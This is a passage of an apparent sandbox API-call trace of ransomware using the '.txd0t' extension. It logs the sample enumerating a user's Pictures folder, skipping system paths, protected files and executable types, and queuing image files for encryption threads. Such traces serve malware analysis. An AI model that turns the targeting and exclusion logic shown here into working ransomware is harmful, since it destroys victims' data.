returned="C:\\Users\\FD1HVy\\Pictures" [0075.828] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.828] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Camera Roll", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system32\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\local\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\boot\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\perflogs\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\programdata\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\drivers\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\wsus\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="crypt_detect") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="cryptolocker") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="ransomware") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\WINDOWS") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files") returned 0x0 [0075.828] GetProcessHeap () returned 0xe30000 [0075.828] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ca) returned 0xed31f0 [0075.829] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0075.829] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", psz2="\\*", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*" [0075.829] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0075.834] StrCmpW (psz1=".", psz2=".") returned 0 [0075.834] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.834] StrCmpW (psz1="..", psz2=".") returned 1 [0075.834] StrCmpW (psz1="..", psz2="..") returned 0 [0075.834] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.834] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0075.834] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0075.834] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0075.834] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0075.836] GetProcessHeap () returned 0xe30000 [0075.836] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0075.836] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.836] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0075.836] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0075.836] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2093e810, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0x1b242240, ftLastAccessTime.dwHighDateTime=0x1d5ece0, ftLastWriteTime.dwLowDateTime=0x1b242240, ftLastWriteTime.dwHighDateTime=0x1d5ece0, nFileSizeHigh=0x0, nFileSizeLow=0x10f22, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="dF_BgEryZj.gif", cAlternateFileName="DF_BGE~1.GIF")) returned 1 [0075.836] StrCmpW (psz1="dF_BgEryZj.gif", psz2=".") returned 1 [0075.836] StrCmpW (psz1="dF_BgEryZj.gif", psz2="..") returned 1 [0075.836] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.836] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.836] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="dF_BgEryZj.gif", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif") returned="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" [0075.836] PathFindExtensionW (pszPath="dF_BgEryZj.gif") returned=".gif" [0075.836] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="bootsect.bak") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="iconcache.db") returned -1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="thumbs.db") returned -1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2=" ransomware ") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2=" ransom ") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="debug.txt") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="boot.ini") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="desktop.ini") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="autorun.inf") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="ntuser.dat") returned -1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="ntldr") returned -1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="ntdetect.com") returned -1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="bootfont.bin") returned 1 [0075.836] StrCmpIW (psz1="dF_BgEryZj.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.836] PathFindExtensionW (pszPath="dF_BgEryZj.gif") returned=".gif" [0075.836] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0075.837] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.837] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.837] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0075.872] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.872] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" [0075.872] SetEvent (hEvent=0x418) returned 1 [0075.872] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744e5b30, ftCreationTime.dwHighDateTime=0x1d5e6bc, ftLastAccessTime.dwLowDateTime=0xcba39720, ftLastAccessTime.dwHighDateTime=0x1d5e819, ftLastWriteTime.dwLowDateTime=0xcba39720, ftLastWriteTime.dwHighDateTime=0x1d5e819, nFileSizeHigh=0x0, nFileSizeLow=0x1d4d, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="F1oeE.png", cAlternateFileName="")) returned 1 [0075.872] StrCmpW (psz1="F1oeE.png", psz2=".") returned 1 [0075.872] StrCmpW (psz1="F1oeE.png", psz2="..") returned 1 [0075.872] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.872] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.872] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="F1oeE.png", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png") returned="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" [0075.872] PathFindExtensionW (pszPath="F1oeE.png") returned=".png" [0075.873] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="bootsect.bak") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="iconcache.db") returned -1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="thumbs.db") returned -1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2=" ransomware ") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2=" ransom ") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="debug.txt") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="boot.ini") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="desktop.ini") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="autorun.inf") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="ntuser.dat") returned -1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="ntldr") returned -1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="ntdetect.com") returned -1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="bootfont.bin") returned 1 [0075.873] StrCmpIW (psz1="F1oeE.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.873] PathFindExtensionW (pszPath="F1oeE.png") returned=".png" [0075.873] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0075.873] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.873] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.873] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0075.873] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.873] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" [0075.873] SetEvent (hEvent=0x410) returned 1 [0075.873] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6004be50, ftCreationTime.dwHighDateTime=0x1d5ed5e, ftLastAccessTime.dwLowDateTime=0xf3c22a90, ftLastAccessTime.dwHighDateTime=0x1d5e4f0, ftLastWriteTime.dwLowDateTime=0xf3c22a90, ftLastWriteTime.dwHighDateTime=0x1d5e4f0, nFileSizeHigh=0x0, nFileSizeLow=0x3254, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="gpNFvPMeWkFC.gif", cAlternateFileName="GPNFVP~1.GIF")) returned 1 [0075.873] StrCmpW (psz1="gpNFvPMeWkFC.gif", psz2=".") returned 1 [0075.873] StrCmpW (psz1="gpNFvPMeWkFC.gif", psz2="..") returned 1 [0075.873] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="gpNFvPMeWkFC.gif", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif") returned="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" [0075.873] PathFindExtensionW (pszPath="gpNFvPMeWkFC.gif") returned=".gif" [0075.873] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="bootsect.bak") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="iconcache.db") returned -1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="thumbs.db") returned -1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2=" ransomware ") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2=" ransom ") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="debug.txt") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="boot.ini") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="desktop.ini") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="autorun.inf") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="ntuser.dat") returned -1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="ntldr") returned -1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="ntdetect.com") returned -1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="bootfont.bin") returned 1 [0075.874] StrCmpIW (psz1="gpNFvPMeWkFC.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.874] PathFindExtensionW (pszPath="gpNFvPMeWkFC.gif") returned=".gif" [0075.874] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0075.874] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.874] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.874] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0075.886] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.886] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" [0075.886] SetEvent (hEvent=0x408) returned 1 [0075.886] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb41f0, ftCreationTime.dwHighDateTime=0x1d5ed24, ftLastAccessTime.dwLowDateTime=0xd75a8bc0, ftLastAccessTime.dwHighDateTime=0x1d5e790, ftLastWriteTime.dwLowDateTime=0xd75a8bc0, ftLastWriteTime.dwHighDateTime=0x1d5e790, nFileSizeHigh=0x0, nFileSizeLow=0x16918, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="g_PWWk0DwHdiVJ7TQ.jpg", cAlternateFileName="G_PWWK~1.JPG")) returned 1 [0075.886] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2=".") returned 1 [0075.886] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="..") returned 1 [0075.886] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.886] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.886] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="g_PWWk0DwHdiVJ7TQ.jpg", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" [0075.886] PathFindExtensionW (pszPath="g_PWWk0DwHdiVJ7TQ.jpg") returned=".jpg" [0075.887] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="bootsect.bak") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="iconcache.db") returned -1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="thumbs.db") returned -1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2=" ransomware ") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2=" ransom ") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="debug.txt") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="boot.ini") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="desktop.ini") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="autorun.inf") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="ntuser.dat") returned -1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="ntldr") returned -1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="ntdetect.com") returned -1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="bootfont.bin") returned 1 [0075.887] StrCmpIW (psz1="g_PWWk0DwHdiVJ7TQ.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.887] PathFindExtensionW (pszPath="g_PWWk0DwHdiVJ7TQ.jpg") returned=".jpg" [0075.887] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0075.887] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.888] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.888] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.888] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.888] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" [0075.888] SetEvent (hEvent=0x3fc) returned 1 [0075.888] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36585490, ftCreationTime.dwHighDateTime=0x1d5e6e7, ftLastAccessTime.dwLowDateTime=0x861a3360, ftLastAccessTime.dwHighDateTime=0x1d5e4e7, ftLastWriteTime.dwLowDateTime=0x861a3360, ftLastWriteTime.dwHighDateTime=0x1d5e4e7, nFileSizeHigh=0x0, nFileSizeLow=0xa82d, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="JNDCEREvKtt-06-A0UX8.png", cAlternateFileName="JNDCER~1.PNG")) returned 1 [0075.888] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2=".") returned 1 [0075.888] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="..") returned 1 [0075.888] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.888] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.888] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="JNDCEREvKtt-06-A0UX8.png", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png") returned="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" [0075.888] PathFindExtensionW (pszPath="JNDCEREvKtt-06-A0UX8.png") returned=".png" [0075.888] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="bootsect.bak") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="iconcache.db") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="thumbs.db") returned -1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2=" ransomware ") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2=" ransom ") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="debug.txt") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="boot.ini") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="desktop.ini") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="autorun.inf") returned 1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="ntuser.dat") returned -1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="ntldr") returned -1 [0075.888] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="ntdetect.com") returned -1 [0075.889] StrCmpIW 